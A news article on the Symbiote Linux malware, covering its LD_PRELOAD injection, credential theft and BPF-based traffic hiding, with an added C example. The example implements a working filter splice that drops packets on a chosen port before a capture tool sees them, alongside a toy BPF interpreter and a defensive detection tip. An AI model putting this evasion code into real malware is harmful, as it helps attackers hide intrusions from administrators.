Researchers have discovered a new malware family targeting Linux systems with a parasitic effect. Known as "Symbiote," the malware infects Linux processes to provide rootkit functionality to the attackers.
About Symbiote Linux Malware
Following a joint analysis by their researchers, the BlackBerry Threat Research & Intelligence team and Intezer have shared insights about the newly discovered Linux malware. The researchers named it "Symbiote" because it exhibits symbiotic (or rather parasitic) behavior on Linux systems.
In brief, unlike other malware that aggressively kills system processes, Symbiote loads into all running processes as a shared object (SO) library and uses those host processes to do its damage. Once loaded, the malware steals credentials from the system and provides remote access to the attackers.
Besides that, it also exhibits considerable stealth by using Berkeley Packet Filter (BPF) hooking functionality to hide malicious network traffic.
When an administrator starts any packet capture tool on the infected machine, BPF bytecode is injected into the kernel that defines which packets should be captured. During this process, Symbiote prepends its own bytecode to the filter so that it can drop the network traffic it doesn't want the packet-capturing software to see, before the tool's own filter ever runs.
Moreover, the malware also abuses the dynamic linker's LD_PRELOAD mechanism to be loaded before other shared objects, so that its own exports take precedence over library functions of the same name. That is how the malware hijacks other library imports and evades detection. The following chart illustrates the evasion techniques that Symbiote applies during infections.
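The filter splice described above, as an added example that is not part of the original article or of the Symbiote code: a toy classic-BPF interpreter, a capture tool's own "ip and tcp" program, and an attacker-side function that prepends a drop rule for one TCP port (4444 here, an arbitrary constructed value) before the tool's program would be handed to the kernel. In a real rootkit the splice sits inside the LD_PRELOAD hook of whatever call passes the program to the kernel (the setsockopt SO_ATTACH_FILTER path used by libpcap is the assumption here); the frame layout, offsets and ports are constructed and assume Ethernet plus IPv4 without options.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Classic BPF instruction layout and opcode values, identical to
 * struct sock_filter and the BPF_* macros in <linux/filter.h>;
 * defined here so the example builds without kernel headers. */
struct cbpf_insn { uint16_t code; uint8_t jt, jf; uint32_t k; };
#define BPF_LD   0x00
#define BPF_JMP  0x05
#define BPF_RET  0x06
#define BPF_H    0x08
#define BPF_B    0x10
#define BPF_ABS  0x20
#define BPF_JEQ  0x10
#define BPF_K    0x00

/* Minimal interpreter for the four opcodes used below, with the kernel's
 * semantics: jumps are relative to the next instruction, an out-of-bounds
 * load rejects the packet, and RET k returns k (0 means "drop"). */
uint32_t run_cbpf(const struct cbpf_insn *prog, size_t len,
                  const uint8_t *pkt, size_t pktlen)
{
    uint32_t A = 0;
    for (size_t pc = 0; pc < len; pc++) {
        const struct cbpf_insn *in = &prog[pc];
        switch (in->code) {
        case BPF_LD | BPF_H | BPF_ABS:
            if (in->k + 2 > pktlen) return 0;
            A = ((uint32_t)pkt[in->k] << 8) | pkt[in->k + 1];
            break;
        case BPF_LD | BPF_B | BPF_ABS:
            if (in->k + 1 > pktlen) return 0;
            A = pkt[in->k];
            break;
        case BPF_JMP | BPF_JEQ | BPF_K:
            pc += (A == in->k) ? in->jt : in->jf;
            break;
        case BPF_RET | BPF_K:
            return in->k;
        default:
            return 0;            /* opcode not modelled by this toy VM */
        }
    }
    return 0;
}

/* Attacker-side splice: prepend a program that returns 0 (drop) for any
 * IPv4/TCP packet whose source or destination port equals `port` and
 * falls through to the tool's own program otherwise. Offsets assume
 * Ethernet + IPv4 without options (a real filter would load IHL into X).
 * cBPF jumps are relative, so the original program runs unchanged. */
size_t prepend_hide_port(uint16_t port,
                         const struct cbpf_insn *orig, size_t orig_len,
                         struct cbpf_insn *out, size_t out_cap)
{
    const struct cbpf_insn prefix[] = {
        { BPF_LD  | BPF_H   | BPF_ABS, 0, 0, 12 },     /* A = ethertype     */
        { BPF_JMP | BPF_JEQ | BPF_K,   0, 7, 0x0800 }, /* not IPv4 -> orig  */
        { BPF_LD  | BPF_B   | BPF_ABS, 0, 0, 23 },     /* A = IP protocol   */
        { BPF_JMP | BPF_JEQ | BPF_K,   0, 5, 6 },      /* not TCP -> orig   */
        { BPF_LD  | BPF_H   | BPF_ABS, 0, 0, 34 },     /* A = TCP src port  */
        { BPF_JMP | BPF_JEQ | BPF_K,   2, 0, port },   /* match -> ret 0    */
        { BPF_LD  | BPF_H   | BPF_ABS, 0, 0, 36 },     /* A = TCP dst port  */
        { BPF_JMP | BPF_JEQ | BPF_K,   0, 1, port },   /* match -> ret 0    */
        { BPF_RET | BPF_K,             0, 0, 0 },      /* hidden: drop      */
    };
    size_t n = sizeof prefix / sizeof prefix[0];
    if (n + orig_len > out_cap) return 0;
    memcpy(out, prefix, sizeof prefix);
    memcpy(out + n, orig, orig_len * sizeof *orig);
    return n + orig_len;
}

/* The capture tool's own filter, equivalent to tcpdump's "ip and tcp". */
const struct cbpf_insn tool_filter[] = {
    { BPF_LD  | BPF_H   | BPF_ABS, 0, 0, 12 },
    { BPF_JMP | BPF_JEQ | BPF_K,   0, 3, 0x0800 },
    { BPF_LD  | BPF_B   | BPF_ABS, 0, 0, 23 },
    { BPF_JMP | BPF_JEQ | BPF_K,   0, 1, 6 },
    { BPF_RET | BPF_K,             0, 0, 0xffff },     /* accept */
    { BPF_RET | BPF_K,             0, 0, 0 },          /* reject */
};
const size_t tool_filter_len = sizeof tool_filter / sizeof tool_filter[0];

/* Constructed 54-byte Ethernet/IPv4/TCP frame: zeros except the fields
 * the filters inspect. Returns the frame length. */
size_t make_tcp_frame(uint8_t *buf, uint16_t sport, uint16_t dport)
{
    memset(buf, 0, 54);
    buf[12] = 0x08; buf[13] = 0x00;                    /* ethertype IPv4 */
    buf[14] = 0x45;                                    /* IPv4, IHL = 5  */
    buf[23] = 6;                                       /* protocol TCP   */
    buf[34] = sport >> 8; buf[35] = sport & 0xff;
    buf[36] = dport >> 8; buf[37] = dport & 0xff;
    return 54;
}

/* Verdict for a src/dst port pair under the tool's filter alone
 * (spliced == 0) or with the hidden-port prefix in front (spliced != 0). */
uint32_t verdict(uint16_t hidden, uint16_t sport, uint16_t dport, int spliced)
{
    uint8_t frame[64];
    struct cbpf_insn prog[32];
    size_t len = make_tcp_frame(frame, sport, dport);
    if (!spliced) return run_cbpf(tool_filter, tool_filter_len, frame, len);
    size_t n = prepend_hide_port(hidden, tool_filter, tool_filter_len, prog, 32);
    return run_cbpf(prog, n, frame, len);
}

int main(void)
{
    printf("tool filter alone, dst 4444 : %u\n", verdict(4444, 51000, 4444, 0));
    printf("with rootkit prefix, dst 4444: %u\n", verdict(4444, 51000, 4444, 1));
    printf("with rootkit prefix, dst 80  : %u\n", verdict(4444, 51000, 80, 1));
    return 0;
}
```

Because the prefix executes inside the kernel's filter, a packet to the hidden port never reaches the capture tool's buffer at all, so no amount of inspecting the tool's output on the infected host will show it. The practical check is to capture from a different vantage point (a mirror port or a neighbouring host) and compare, since only captures started on the infected machine pass through the hooked loader.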
While the researchers only recently shared details of the malware, it isn't entirely new. Rather, the malware has been active in the wild, with its first samples dating back to November 2021. According to the researchers, the threat actors used this malware to target financial institutions in Latin America.
The researchers found that its code doesn't resemble any known Linux malware family, confirming that it is entirely new. However, it does exhibit slight similarities with the Ebury malware, discovered in 2014, which also serves as a backdoor for the attackers and as a credential harvester.
Let us know your thoughts in the comments.